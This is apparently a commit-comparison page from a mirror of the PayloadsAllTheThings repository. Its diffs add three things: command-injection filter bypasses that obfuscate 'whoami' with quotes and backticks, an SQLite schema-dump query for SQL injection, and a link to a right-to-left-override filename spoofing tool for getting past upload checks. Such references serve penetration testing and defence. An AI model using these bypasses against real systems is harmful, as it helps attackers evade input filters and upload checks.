mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-09 15:56:15 +02:00
Compare commits
6 Commits
56d22aa536
...
f02f42540c
Author | SHA1 | Date | |
---|---|---|---|
J-GainSec | f02f42540c | ||
Swissky | 80dda8beeb | ||
Swissky | 8ef458db2a | ||
mohnad banat | d834abe43c | ||
xplo1t-sec | 033982dc30 | ||
J-GainSec | 4f4d7b3bf5 |
|
@ -18,6 +18,7 @@
|
|||
* [Bypass blacklisted words](#bypass-blacklisted-words)
|
||||
* [Bypass with single quote](#bypass-with-single-quote)
|
||||
* [Bypass with double quote](#bypass-with-double-quote)
|
||||
* [Bypass with backticks](#bypass-with-backticks)
|
||||
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
|
||||
* [Bypass with $@](#bypass-with-)
|
||||
* [Bypass with $()](#bypass-with--1)
|
||||
|
@ -245,12 +246,20 @@ root:x:0:0:root:/root:/bin/bash
|
|||
|
||||
```powershell
|
||||
w'h'o'am'i
|
||||
wh''oami
|
||||
```
|
||||
|
||||
#### Bypass with double quote
|
||||
|
||||
```powershell
|
||||
w"h"o"am"i
|
||||
wh""oami
|
||||
```
|
||||
|
||||
#### Bypass with backticks
|
||||
|
||||
```powershell
|
||||
wh``oami
|
||||
```
|
||||
|
||||
#### Bypass with backslash and slash
|
||||
|
|
|
@ -33,7 +33,10 @@ select sqlite_version();
|
|||
```sql
|
||||
SELECT sql FROM sqlite_schema
|
||||
```
|
||||
|
||||
if sqlite_version > 3.33.0
|
||||
```sql
|
||||
SELECT sql FROM sqlite_master
|
||||
```
|
||||
## Integer/String based - Extract table name
|
||||
|
||||
```sql
|
||||
|
|
|
@ -80,7 +80,7 @@
|
|||
* `file.php%20`
|
||||
* `file.php%0d%0a.jpg`
|
||||
* `file.php%0a`
|
||||
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
|
||||
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. - [Automated Script for RTLO](https://github.com/GainSec/RTLOify)
|
||||
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
|
||||
* Multiple special characters: `file.jsp/././././.`
|
||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||
|
@ -219,4 +219,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
|
|||
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
|
||||
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
|
||||
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
|
||||
* [PHP Internals Book - THE .PHPT FILE STRUCTURE](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
|
||||
* [PHP Internals Book - THE .PHPT FILE STRUCTURE](https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
|
||||
|
|
Loading…
Reference in New Issue